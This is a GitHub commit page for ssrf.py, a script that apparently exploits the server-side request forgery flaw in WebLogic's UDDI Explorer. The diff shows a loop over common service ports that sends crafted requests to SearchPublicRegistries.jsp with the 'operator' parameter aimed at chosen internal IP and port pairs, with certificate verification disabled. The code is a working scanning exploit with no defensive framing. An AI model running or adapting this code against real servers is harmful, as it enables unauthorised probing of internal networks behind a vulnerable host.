Skip to content

Commit f0b6d49

Browse files
committed
update ssrf
1 parent 2988ab9 commit f0b6d49

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

ssrf.py

+1-1
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88
def scan(ip_str):
99
ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)
1010
for port in ports:
11-
exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)
11+
exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)
1212
try:
1313
response = requests.get(exp_url, timeout=15, verify=False)
1414
#SSRF判断

0 commit comments

Comments
 (0)